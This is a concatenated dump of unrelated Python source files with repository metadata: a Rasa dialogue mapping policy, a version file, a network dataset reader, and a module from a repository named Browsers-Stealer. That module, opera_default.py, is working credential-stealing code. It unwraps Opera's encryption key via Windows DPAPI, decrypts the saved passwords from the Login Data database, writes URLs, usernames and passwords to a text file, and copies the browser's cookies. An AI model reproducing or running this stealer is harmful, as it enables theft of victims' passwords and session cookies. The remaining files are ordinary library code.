four = bits.GetChildMemberWithName("four")
self.assertEqual(four.GetName(), "four")
self.assertEqual(four.GetTypeName(), "uint32_t:4")
self.assertTrue(four.IsInScope())
self.assertEqual(int(four.GetValue(), 0), 15)
| 49.476471
| 107
| 0.628344
|
4a144d60c43e9a24cd3ce70b00e81e56f33e7c51
| 7,116
|
py
|
Python
|
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | 1
|
2020-09-23T11:04:38.000Z
|
2020-09-23T11:04:38.000Z
|
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | null | null | null |
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | null | null | null |
import logging
import json
import os
import typing
from typing import Any, List, Text, Optional
from rasa.constants import DOCS_URL_POLICIES, DOCS_URL_MIGRATION_GUIDE
import rasa.utils.io
from rasa.nlu.constants import INTENT_NAME_KEY
from rasa.utils import common as common_utils
from rasa.core.actions.action import (
ACTION_BACK_NAME,
ACTION_LISTEN_NAME,
ACTION_RESTART_NAME,
ACTION_SESSION_START_NAME,
)
from rasa.core.constants import (
USER_INTENT_BACK,
USER_INTENT_RESTART,
USER_INTENT_SESSION_START,
)
from rasa.core.domain import Domain, InvalidDomain
from rasa.core.events import ActionExecuted
from rasa.core.interpreter import NaturalLanguageInterpreter
from rasa.core.policies.policy import Policy
from rasa.core.trackers import DialogueStateTracker
from rasa.core.training.generator import TrackerWithCachedStates
from rasa.core.constants import MAPPING_POLICY_PRIORITY
import rasa.shared.utils.io
if typing.TYPE_CHECKING:
from rasa.core.policies.ensemble import PolicyEnsemble
logger = logging.getLogger(__name__)
class MappingPolicy(Policy):
"""Policy which maps intents directly to actions.
Intents can be assigned actions in the domain file which are to be
executed whenever the intent is detected. This policy takes precedence over
any other policy.
"""
@staticmethod
def _standard_featurizer() -> None:
return None
def __init__(self, priority: int = MAPPING_POLICY_PRIORITY) -> None:
"""Create a new Mapping policy."""
super().__init__(priority=priority)
common_utils.raise_deprecation_warning(
f"'{MappingPolicy.__name__}' is deprecated and will be removed in "
"the future. It is recommended to use the 'RulePolicy' instead.",
docs=DOCS_URL_MIGRATION_GUIDE,
)
@classmethod
def validate_against_domain(
cls, ensemble: Optional["PolicyEnsemble"], domain: Optional[Domain]
) -> None:
if not domain:
return
has_mapping_policy = ensemble is not None and any(
isinstance(p, cls) for p in ensemble.policies
)
has_triggers_in_domain = any(
[
"triggers" in properties
for intent, properties in domain.intent_properties.items()
]
)
if has_triggers_in_domain and not has_mapping_policy:
raise InvalidDomain(
"You have defined triggers in your domain, but haven't "
"added the MappingPolicy to your policy ensemble. "
"Either remove the triggers from your domain or "
"exclude the MappingPolicy from your policy configuration."
)
def train(
self,
training_trackers: List[TrackerWithCachedStates],
domain: Domain,
interpreter: NaturalLanguageInterpreter,
**kwargs: Any,
) -> None:
"""Does nothing. This policy is deterministic."""
pass
def predict_action_probabilities(
self,
tracker: DialogueStateTracker,
domain: Domain,
interpreter: NaturalLanguageInterpreter,
**kwargs: Any,
) -> List[float]:
"""Predicts the assigned action.
If the current intent is assigned to an action that action will be
predicted with the highest probability of all policies. If it is not
the policy will predict zero for every action."""
result = self._default_predictions(domain)
intent = tracker.latest_message.intent.get(INTENT_NAME_KEY)
if intent == USER_INTENT_RESTART:
action = ACTION_RESTART_NAME
elif intent == USER_INTENT_BACK:
action = ACTION_BACK_NAME
elif intent == USER_INTENT_SESSION_START:
action = ACTION_SESSION_START_NAME
else:
action = domain.intent_properties.get(intent, {}).get("triggers")
if tracker.latest_action_name == ACTION_LISTEN_NAME:
# predict mapped action
if action:
idx = domain.index_for_action(action)
if idx is None:
rasa.shared.utils.io.raise_warning(
f"MappingPolicy tried to predict unknown "
f"action '{action}'. Make sure all mapped actions are "
f"listed in the domain.",
docs=DOCS_URL_POLICIES + "#mapping-policy",
)
else:
result[idx] = 1
if any(result):
logger.debug(
"The predicted intent '{}' is mapped to "
" action '{}' in the domain."
"".format(intent, action)
)
elif tracker.latest_action_name == action and action is not None:
# predict next action_listen after mapped action
latest_action = tracker.get_last_event_for(ActionExecuted)
assert latest_action.action_name == action
if latest_action.policy and latest_action.policy.endswith(
type(self).__name__
):
# this ensures that we only predict listen,
# if we predicted the mapped action
logger.debug(
"The mapped action, '{}', for this intent, '{}', was "
"executed last so MappingPolicy is returning to "
"action_listen.".format(action, intent)
)
idx = domain.index_for_action(ACTION_LISTEN_NAME)
result[idx] = 1
else:
logger.debug(
"The mapped action, '{}', for the intent, '{}', was "
"executed last, but it was predicted by another policy, '{}', "
"so MappingPolicy is not predicting any action.".format(
action, intent, latest_action.policy
)
)
elif action == ACTION_RESTART_NAME:
logger.debug("Restarting the conversation with action_restart.")
idx = domain.index_for_action(ACTION_RESTART_NAME)
result[idx] = 1
else:
logger.debug(
"There is no mapped action for the predicted intent, "
"'{}'.".format(intent)
)
return result
def persist(self, path: Text) -> None:
"""Only persists the priority."""
config_file = os.path.join(path, "mapping_policy.json")
meta = {"priority": self.priority}
rasa.utils.io.create_directory_for_file(config_file)
rasa.utils.io.dump_obj_as_json_to_file(config_file, meta)
@classmethod
def load(cls, path: Text) -> "MappingPolicy":
"""Returns the class with the configured priority."""
meta = {}
if os.path.exists(path):
meta_path = os.path.join(path, "mapping_policy.json")
if os.path.isfile(meta_path):
meta = json.loads(rasa.utils.io.read_file(meta_path))
return cls(**meta)
| 36.121827
| 83
| 0.61172
|
4a144d61db1d5d0758ebe119303d64721843ceb3
| 3,208
|
py
|
Python
|
stink/browsers/opera_default.py
|
WolfInChains/Browsers-Stealer
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 4
|
2020-06-24T15:46:35.000Z
|
2021-05-17T13:20:51.000Z
|
stink/browsers/opera_default.py
|
faritpro/stink
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 3
|
2021-03-31T19:51:32.000Z
|
2021-06-04T13:23:22.000Z
|
stink/browsers/opera_default.py
|
faritpro/stink
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 3
|
2020-10-15T12:37:10.000Z
|
2021-04-05T12:58:48.000Z
|
from json import loads
from sqlite3 import connect
from shutil import copyfile
from base64 import b64decode
from os import environ, sep, path, remove, mkdir
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
class Opera_Default:
def __init__(self, storage_path: str, storage_folder: str, browser_folder: str, errors: bool):
self.storage_path = storage_path
self.storage_folder = storage_folder
self.browser_folder = browser_folder
self.errors = errors
self.state_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Local State'
self.cookies_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Cookies'
self.passwords_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Login Data'
def __check_files(self):
if (path.exists(self.passwords_path)) is True or (path.exists(self.cookies_path)) is True:
mkdir(f"{self.storage_path}{self.storage_folder}{self.browser_folder}")
def __get_key(self):
with open(self.state_path, "r", encoding='utf-8') as state:
local_state = loads(state.read())
return CryptUnprotectData(b64decode(local_state["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
def __decrypt_password(self, buff, master_key):
try:
return AES.new(master_key, AES.MODE_GCM, buff[3:15]).decrypt(buff[15:])[:-16].decode()
except:
return "Old version"
def __write_passwords(self, cursor, master_key):
with open(f"{self.storage_path}{self.storage_folder}{self.browser_folder}/Opera Default Passwords.txt", "a", encoding='utf-8') as passwords:
results = cursor.execute("SELECT action_url, username_value, password_value FROM logins").fetchall()
for result in results:
password = self.__decrypt_password(result[2], master_key)
if (result[0], result[1], password) != ("", "", ""):
passwords.write(f"URL: {result[0]}\nUsername: {result[1]}\nPassword: {password}\n\n")
else:
continue
passwords.close()
def run(self):
try:
self.__check_files()
if (path.exists(self.passwords_path)) is True:
master_key = self.__get_key()
copyfile(self.passwords_path, f"{self.storage_path}Opera_Default.db")
with connect(f"{self.storage_path}Opera_Default.db") as connection:
cursor = connection.cursor()
self.__write_passwords(cursor, master_key)
cursor.close()
connection.close()
if (path.exists(self.cookies_path)) is True:
copyfile(self.cookies_path, f"{self.storage_path}{self.storage_folder}{self.browser_folder}/Opera Default Cookies", follow_symlinks=True)
remove(f"{self.storage_path}Opera_Default.db")
except Exception as e:
if self.errors is True:
print(f"[OPERA_DEFAULT]: {repr(e)}")
else:
pass
| 31.45098
| 153
| 0.632793
|
4a144e58836677b20381a2367b357b8e38ea8351
| 594
|
py
|
Python
|
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
# Copyright WillianFuks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = '0.0.2'
| 34.941176
| 74
| 0.757576
|
4a14506c983156539ffeca40df4f28955c5f277a
| 41,173
|
py
|
Python
|
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
'''
*
* Copyright (C) 2020 Universitat Politècnica de Catalunya.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
'''
# -*- coding: utf-8 -*-
import os, tarfile, numpy, math, networkx, queue, random,traceback, wget
from enum import IntEnum
from extract import ExtractNested
import timeit
def extract_nested(file_path):
ExtractNested(file_path)
#os.system(f"tar -xfv {file_path}")
#os.system("find . -name \""+file_path+"*.tar.gz\" -exec tar xzf {} \;")
def download_dataset(data_folder,
base_url = "https://bnn.upc.edu/download/",
files = ["ch21-training-dataset", "ch21-validation-dataset"]):
for file in files:
file_path = os.path.join(data_folder, file)
if os.path.exists(file_path):
print('File %s exists, skipping...' % file)
continue
elif os.path.exists(file_path+".tar.gz"):
print('File %s.tar.gz exists, extracting...' % file)
extract_nested(file_path+".tar.gz")
print('Downloading file: ', file)
www_path = os.path.join(base_url, file)
wget.download(www_path, out=file_path+".tar.gz")
print('Extracting File: ', file)
extract_nested(file_path)
print('Done Downloading and Extracting Dataset!')
class DatanetException(Exception):
"""
Exceptions generated when processing dataset
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class TimeDist(IntEnum):
"""
Enumeration of the supported time distributions
"""
EXPONENTIAL_T = 0
DETERMINISTIC_T = 1
UNIFORM_T = 2
NORMAL_T = 3
ONOFF_T = 4
PPBP_T = 5
@staticmethod
def getStrig(timeDist):
if (timeDist == 0):
return ("EXPONENTIAL_T")
elif (timeDist == 1):
return ("DETERMINISTIC_T")
elif (timeDist == 2):
return ("UNIFORM_T")
elif (timeDist == 3):
return ("NORMAL_T")
elif (timeDist == 4):
return ("ONOFF_T")
elif (timeDist == 5):
return ("PPBP_T")
else:
return ("UNKNOWN")
class SizeDist(IntEnum):
"""
Enumeration of the supported size distributions
"""
DETERMINISTIC_S = 0
UNIFORM_S = 1
BINOMIAL_S = 2
GENERIC_S = 3
@staticmethod
def getStrig(sizeDist):
if (sizeDist == 0):
return ("DETERMINISTIC_S")
elif (sizeDist == 1):
return ("UNIFORM_S")
elif (sizeDist == 2):
return ("BINOMIAL_S")
elif (sizeDist ==3):
return ("GENERIC_S")
else:
return ("UNKNOWN")
class Sample:
"""
Class used to contain the results of a single iteration in the dataset
reading process.
...
Attributes
----------
global_packets : double
Overall number of packets transmitteds in network
global_losses : double
Overall number of packets lost in network
global_delay : double
Overall delay in network
maxAvgLambda: double
This variable is used in our simulator to define the overall traffic
intensity of the network scenario
performance_matrix : NxN matrix
Matrix where each cell [i,j] contains aggregated and flow-level
information about transmission parameters between source i and
destination j.
traffic_matrix : NxN matrix
Matrix where each cell [i,j] contains aggregated and flow-level
information about size and time distributions between source i and
destination j.
routing_matrix : NxN matrix
Matrix where each cell [i,j] contains the path, if it exists, between
source i and destination j.
topology_object :
Network topology using networkx format.
links_performance: list-of-dict-of-dict data structure:
The outer list contain a dict-of-dict for each node. The first dict contain
the list of adjacents nodes and the last dict contain the parameters of the link.
"""
global_packets = None
global_losses = None
global_delay = None
maxAvgLambda = None
performance_matrix = None
traffic_matrix = None
routing_matrix = None
topology_object = None
links_performance = None
data_set_file = None
_results_line = None
_traffic_line = None
_input_files_line = None
_status_line = None
_flowresults_line = None
_link_usage_line = None
_routing_file = None
_graph_file = None
def get_global_packets(self):
"""
Return the number of packets transmitted in the network per time unit of this Sample instance.
"""
return self.global_packets
def get_global_losses(self):
"""
Return the number of packets dropped in the network per time unit of this Sample instance.
"""
return self.global_losses
def get_global_delay(self):
"""
Return the average per-packet delay over all the packets transmitted in the network in time units
of this sample instance.
"""
return self.global_delay
def get_maxAvgLambda(self):
"""
Returns the maxAvgLamda used in the current iteration. This variable is used in our simulator to define
the overall traffic intensity of the network scenario.
"""
return self.maxAvgLambda
def get_performance_matrix(self):
"""
Returns the performance_matrix of this Sample instance.
"""
return self.performance_matrix
def get_srcdst_performance(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Result matrix for the requested src-dst.
"""
return self.performance_matrix[src, dst]
def get_traffic_matrix(self):
"""
Returns the traffic_matrix of this Sample instance.
"""
return self.traffic_matrix
def get_srcdst_traffic(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Traffic matrix for the requested src-dst.
"""
return self.traffic_matrix[src, dst]
def get_routing_matrix(self):
"""
Returns the routing_matrix of this Sample instance.
"""
return self.routing_matrix
def get_srcdst_routing(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Routing matrix for the requested src-dst.
"""
return self.routing_matrix[src, dst]
def get_topology_object(self):
"""
Returns the topology in networkx format of this Sample instance.
"""
return self.topology_object
def get_network_size(self):
"""
Returns the number of nodes of the topology.
"""
return self.topology_object.number_of_nodes()
def get_node_properties(self, id):
"""
Parameters
----------
id : int
Node identifier.
Returns
-------
Dictionary with the parameters of the node
None if node doesn't exist
"""
res = None
if id in self.topology_object.nodes:
res = self.topology_object.nodes[id]
return res
def get_link_properties(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary with the parameters of the link
None if no link exist between src and dst
"""
res = None
if dst in self.topology_object[src]:
res = self.topology_object[src][dst][0]
return res
def get_srcdst_link_bandwidth(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Bandwidth in bits/time unit of the link between nodes src-dst or -1 if not connected
"""
if dst in self.topology_object[src]:
cap = float(self.topology_object[src][dst][0]['bandwidth'])
else:
cap = -1
return cap
def get_links_performance(self):
"""
Returns the links_performance object of this Sample instance.
"""
if (self.links_performance == None):
raise DatanetException("ERROR: The processed dataset doesn't have link performance data")
return self.links_performance
def get_srcdst_link_performance(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary with the performance metrics of the link
None if no link exist between src and dst
"""
if (self.links_performance == None):
raise DatanetException("ERROR: The processed dataset doesn't have link performance data")
res = None
if dst in self.links_performance[src]:
res = self.links_performance[src][dst]
return res
def _set_data_set_file_name(self,file):
"""
Sets the data set file from where the sample is extracted.
"""
self.data_set_file = file
def _set_performance_matrix(self, m):
"""
Sets the performance_matrix of this Sample instance.
"""
self.performance_matrix = m
def _set_traffic_matrix(self, m):
"""
Sets the traffic_matrix of this Sample instance.
"""
self.traffic_matrix = m
def _set_routing_matrix(self, m):
"""
Sets the traffic_matrix of this Sample instance.
"""
self.routing_matrix = m
def _set_topology_object(self, G):
"""
Sets the topology_object of this Sample instance.
"""
self.topology_object = G
def _set_global_packets(self, x):
"""
Sets the global_packets of this Sample instance.
"""
self.global_packets = x
def _set_global_losses(self, x):
"""
Sets the global_losses of this Sample instance.
"""
self.global_losses = x
def _set_global_delay(self, x):
"""
Sets the global_delay of this Sample instance.
"""
self.global_delay = x
def _get_data_set_file_name(self):
"""
Gets the data set file from where the sample is extracted.
"""
return self.data_set_file
def _get_path_for_srcdst(self, src, dst):
"""
Returns the path between node src and node dst.
"""
return self.routing_matrix[src, dst]
def _get_timedis_for_srcdst (self, src, dst):
"""
Returns the time distribution of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['TimeDist']
def _get_eqlambda_for_srcdst (self, src, dst):
"""
Returns the equivalent lambda for the traffic between node src and node
dst.
"""
return self.traffic_matrix[src, dst]['EqLambda']
def _get_timedistparams_for_srcdst (self, src, dst):
"""
Returns the time distribution parameters for the traffic between node
src and node dst.
"""
return self.traffic_matrix[src, dst]['TimeDistParams']
def _get_sizedist_for_srcdst (self, src, dst):
"""
Returns the size distribution of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['SizeDist']
def _get_avgpktsize_for_srcdst_flow (self, src, dst):
"""
Returns the average packet size for the traffic between node src and
node dst.
"""
return self.traffic_matrix[src, dst]['AvgPktSize']
def _get_sizedistparams_for_srcdst (self, src, dst):
"""
Returns the time distribution of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['SizeDistParams']
def _get_resultdict_for_srcdst (self, src, dst):
"""
Returns the dictionary with all the information for the communication
between node src and node dst regarding communication parameters.
"""
return self.performance_matrix[src, dst]
def _get_trafficdict_for_srcdst (self, src, dst):
"""
Returns the dictionary with all the information for the communication
between node src and node dst regarding size and time distribution
parameters.
"""
return self.traffic_matrix[src, dst]
class DatanetAPI:
"""
Class containing all the functionalities to read the dataset line by line
by means of an iteratos, and generate a Sample instance with the
information gathered.
"""
def __init__ (self, data_folder, intensity_values = [], shuffle=False):
"""
Initialization of the PasringTool instance
Parameters
----------
data_folder : str
Folder where the dataset is stored.
intensity_values : int or array [x, y]
User-defined intensity values used to constrain the reading process
to these/this value/range of values.
shuffle: boolean
Specify if all files should be shuffled. By default false
Returns
-------
None.
"""
self.data_folder = data_folder
self.intensity_values = intensity_values
self.shuffle = shuffle
self._all_tuple_files = []
self._selected_tuple_files = []
self._graphs_dic = {}
self._routings_dic = {}
for root, dirs, files in os.walk(self.data_folder):
if ("graphs" not in dirs or "routings" not in dirs):
print("Downloading dataset")
download_dataset(self.data_folder)
# Generate graphs dictionaries
self._graphs_dic[root] = self._generate_graphs_dic(os.path.join(root,"graphs"))
if (len(self._graphs_dic[root].keys()) == 0):
print("No graphs found in directory "+root)
print("Downloading dataset")
download_dataset(self.data_folder)
self._routings_dic[root] = {}
files.sort()
# Extend the list of files to process
self._all_tuple_files.extend([(root, f) for f in files if f.endswith("tar.gz")])
def get_available_files(self):
"""
Get a list of all the dataset files located in the indicated data folder
Returns
-------
Array of tuples where each tuple is (root directory, filename)
"""
return (self._all_tuple_files.copy())
def set_files_to_process(self, tuple_files_lst):
"""
Set the list of files to be processed by the iterator. The files should belong to
the list of tuples returned by get_available_files.
Parameters
----------
tuple_files_lst: List of tuples
List of tuples where each tuple is (path to file, filename)
"""
if not type(tuple_files_lst) is list:
raise DatanetException("ERROR: The argument of set_files_to_process should be a list of tuples -> [(root_dir,file),...]")
for tuple in tuple_files_lst:
if not type(tuple) is tuple or len(tuple) != 2:
raise DatanetException("ERROR: The argument of set_files_to_process should be a list of tuples -> [(root_dir,file),...]")
if (not tuple in self._all_tuple_files):
raise DatanetException("ERROR: Selected tupla not belong to the list of tuples returned by get_available_files()")
self._selected_tuple_files = tuple_files_lst.copy()
def _readRoutingFile(self, routing_file, netSize):
"""
Pending to compare against getSrcPortDst
Parameters
----------
routing_file : str
File where the routing information is located.
netSize : int
Number of nodes in the network.
Returns
-------
R : netSize x netSize matrix
Matrix where each [i,j] states what port node i should use to
reach node j.
"""
fd = open(routing_file,"r")
R = numpy.zeros((netSize, netSize)) - 1
src = 0
for line in fd:
camps = line.split(',')
dst = 0
for port in camps[:-1]:
R[src][dst] = port
dst += 1
src += 1
return (R)
def _getRoutingSrcPortDst(self, G):
"""
Return a dictionary of dictionaries with the format:
node_port_dst[node][port] = next_node
Parameters
----------
G : TYPE
DESCRIPTION.
Returns
-------
None.
"""
node_port_dst = {}
for node in G:
port_dst = {}
node_port_dst[node] = port_dst
for destination in G[node].keys():
port = G[node][destination][0]['port']
node_port_dst[node][port] = destination
return(node_port_dst)
def _create_routing_matrix_from_dst_routing_file(self, G, routing_file):
"""
Parameters
----------
G : graph
Graph representing the network.
routing_file : str
File where the information about routing is located. The file is a
destination routing file.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
netSize = G.number_of_nodes()
node_port_dst = self._getRoutingSrcPortDst(G)
R = self._readRoutingFile(routing_file, netSize)
MatrixPath = numpy.empty((netSize, netSize), dtype=object)
for src in range (0,netSize):
for dst in range (0,netSize):
node = src
path = [node]
while (R[node][dst] != -1):
out_port = R[node][dst];
next_node = node_port_dst[node][out_port]
path.append(next_node)
node = next_node
MatrixPath[src][dst] = path
return (MatrixPath)
def _create_routing_matrix_from_src_routing_dir(self, G, src_routing_dir):
"""
Parameters
----------
G : graph
Graph representing the network.
src_routing_dir : str
Directory where we found the routing filesFile. One for each src node.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
netSize = G.number_of_nodes()
node_port_dst = self._getRoutingSrcPortDst(G)
src_R = []
for i in range(netSize):
routing_file = os.path.join(src_routing_dir,"Routing_src_"+str(i)+".txt")
src_R.append(self._readRoutingFile(routing_file, netSize))
MatrixPath = numpy.empty((netSize, netSize), dtype=object)
for src in range (0,netSize):
R = src_R[src]
for dst in range (0,netSize):
node = src
path = [node]
while (R[node][dst] != -1):
out_port = R[node][dst];
next_node = node_port_dst[node][out_port]
path.append(next_node)
node = next_node
MatrixPath[src][dst] = path
return (MatrixPath)
def _create_routing_matrix(self, G,routing_file):
"""
Parameters
----------
G : graph
Graph representing the network.
routing_file : str
File where the information about routing is located.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
if (os.path.isfile(routing_file)):
MatrixPath = self._create_routing_matrix_from_dst_routing_file(G,routing_file)
elif(os.path.isdir(routing_file)):
MatrixPath = self._create_routing_matrix_from_src_routing_dir(G,routing_file)
return (MatrixPath)
def _generate_graphs_dic(self, path):
"""
Return a dictionary with networkx objects generated from the GML
files found in path
Parameters
----------
path : str
Direcotory where the graphs files are located.
Returns
-------
Returns a dictionary where keys are the names of GML files found in path
and the values are the networkx object generated from the GML files.
"""
graphs_dic = {}
for topology_file in os.listdir(path):
G = networkx.read_gml(path+"/"+topology_file, destringizer=int)
graphs_dic[topology_file] = G
return graphs_dic
def _graph_links_update(self,G,file):
"""
Updates the graph with the link information of the file
Parameters
----------
G : graph
Graph object to be updated
file: str
file name that contains the information of the links to be modified: src;dst;bw (bps)
Returns
-------
None
"""
try:
fd = open(file,"r")
except:
print ("ERROR: %s not exists" % (file))
exit(-1)
for line in fd:
aux = line.split(";")
G[int(aux[0])][int(aux[1])][0]["bandwidth"] = aux[2]
def _generate_routings_dic(self, path,G):
"""
Return a dictionary with routing matrices generated from the
routing files found in path
Parameters
----------
path : str
Direcotory where the routing files are located.
G : graph
Returns
-------
Returns a dictionary where keys are the names of routing files found in
path and the values are the routing matrices generated from the routing
files.
"""
routings_dic = {}
for routing_file in os.listdir(path):
R = self._create_routing_matrix(G,path+"/"+routing_file)
routings_dic[routing_file] = R
return routings_dic
def _check_intensity(self, file):
"""
Parameters
----------
file : str
Name of the data file that needs to be filtered by intensity.
Returns
-------
2 if the range of intensities treates in the file satisfies the needs
of the user.
1 if there may be lines in the file that do not fulfill the user
requirements.
0 if the file does not fulfill the user-defined intensity requirements.
"""
aux = file.split('_')
aux = aux[2]
aux = aux.split('-')
aux = list(map(int, aux))
# User introduced range of intensities
if(len(self.intensity_values) > 1):
if(len(aux) > 1):
if(aux[0] >= self.intensity_values[0]) and (aux[1] <= self.intensity_values[1]):
return 2
elif(aux[0] > self.intensity_values[1]) or (self.intensity_values[0] > aux[1]):
return 0
else:
return 1
else:
if(aux[0] >= self.intensity_values[0] and aux[0] <= self.intensity_values[1]):
return 2
else:
return 0
# User introduced single intensity
elif (len(self.intensity_values) == 1):
if(len(aux) == 1 and self.intensity_values[0] == aux[0]):
return 2
return 0
else:
return 2
def __iter__(self):
"""
Yields
------
s : Sample
Sample instance containing information about the last line read
from the dataset.
"""
g = None
if (len(self._selected_tuple_files) > 0):
tuple_files = self._selected_tuple_files
else:
tuple_files = self._all_tuple_files
if self.shuffle:
random.Random(1234).shuffle(tuple_files)
ctr = 0
for root, file in tuple_files:
if (len(self.intensity_values) == 0): feasibility_of_file = 2
else: feasibility_of_file = self._check_intensity(file)
if(feasibility_of_file != 0):
try:
it = 0
tar = tarfile.open(os.path.join(root, file), 'r:gz')
dir_info = tar.next()
results_file = tar.extractfile(dir_info.name+"/simulationResults.txt")
traffic_file = tar.extractfile(dir_info.name+"/traffic.txt")
status_file = tar.extractfile(dir_info.name+"/stability.txt")
input_files = tar.extractfile(dir_info.name+"/input_files.txt")
if (dir_info.name+"/flowSimulationResults.txt" in tar.getnames()):
flowresults_file = tar.extractfile(dir_info.name+"/flowSimulationResults.txt")
else:
flowresults_file = None
if (dir_info.name+"/linkUsage.txt" in tar.getnames()):
link_usage_file = tar.extractfile(dir_info.name+"/linkUsage.txt")
else:
link_usage_file = None
while(True):
s = Sample()
s._set_data_set_file_name(os.path.join(root, file))
s._results_line = results_file.readline().decode()[:-2]
s._traffic_line = traffic_file.readline().decode()[:-1]
if (flowresults_file):
s._flowresults_line = flowresults_file.readline().decode()[:-2]
s._status_line = status_file.readline().decode()[:-1]
s._input_files_line = input_files.readline().decode()[:-1]
if (link_usage_file):
s._link_usage_line = link_usage_file.readline().decode()[:-1]
if (len(s._results_line) == 0) or (len(s._traffic_line) == 0):
break
if (not ";OK;" in s._status_line):
print ("Removed iteration: "+s._status_line)
continue;
if (feasibility_of_file == 1):
ptr = s._traffic_line.find('|')
specific_intensity = float(s._traffic_line[0:ptr])
if(specific_intensity < self.intensity_values[0]) or (specific_intensity > self.intensity_values[1]):
continue
used_files = s._input_files_line.split(';')
s._graph_file = used_files[1]
s._routing_file = used_files[2]
g = self._graphs_dic[root][s._graph_file]
if (len(used_files) == 4):
self._graph_links_update(g,os.path.join(root,"links_bw",used_files[3]))
# XXX We considerer that all graphs using the same routing file have the same topology
if (s._routing_file in self._routings_dic[root]):
routing_matrix = self._routings_dic[root][s._routing_file]
else:
routing_matrix = self._create_routing_matrix(g,os.path.join(root,"routings",s._routing_file))
self._routings_dic[root][s._routing_file] = routing_matrix
s._set_routing_matrix(routing_matrix)
s._set_topology_object(g)
self._process_flow_results_traffic_line(s._results_line, s._traffic_line, s._flowresults_line, s._status_line, s)
if (s._link_usage_line):
self._process_link_usage_line(s._link_usage_line,s)
it +=1
yield s
except (GeneratorExit,SystemExit) as e:
raise
except:
#traceback.print_exc()
print ("Error in the file: %s iteration: %d" % (file,it))
else:
continue
ctr += 1
print("Progress check: %d/%d" % (ctr,len(tuple_files)))
def _process_flow_results_traffic_line(self, rline, tline, fline, sline, s):
"""
Parameters
----------
rline : str
Last line read in the results file.
tline : str
Last line read in the traffic file.
fline : str
Last line read in the flows file.
s : Sample
Instance of Sample associated with the current iteration.
Returns
-------
None.
"""
q_flows = queue.Queue()
first_params = rline.split('|')[0].split(',')
first_params = list(map(float, first_params))
s._set_global_packets(first_params[0])
s._set_global_losses(first_params[1])
s._set_global_delay(first_params[2])
r = rline[rline.find('|')+1:].split(';')
if (fline):
f = fline.split(';')
else:
f = r
ptr = tline.find('|')
t = tline[ptr+1:].split(';')
s.maxAvgLambda = float(tline[:ptr])
sim_time = float(sline.split(';')[0])
m_result = []
m_traffic = []
for i in range(0,len(r), int(math.sqrt(len(r)))):
new_result_row = []
new_traffic_row = []
for j in range(i, i+int(math.sqrt(len(r)))):
dict_result_srcdst = {}
aux_agg_ = r[j].split(',')
aux_agg = list(map(float, aux_agg_))
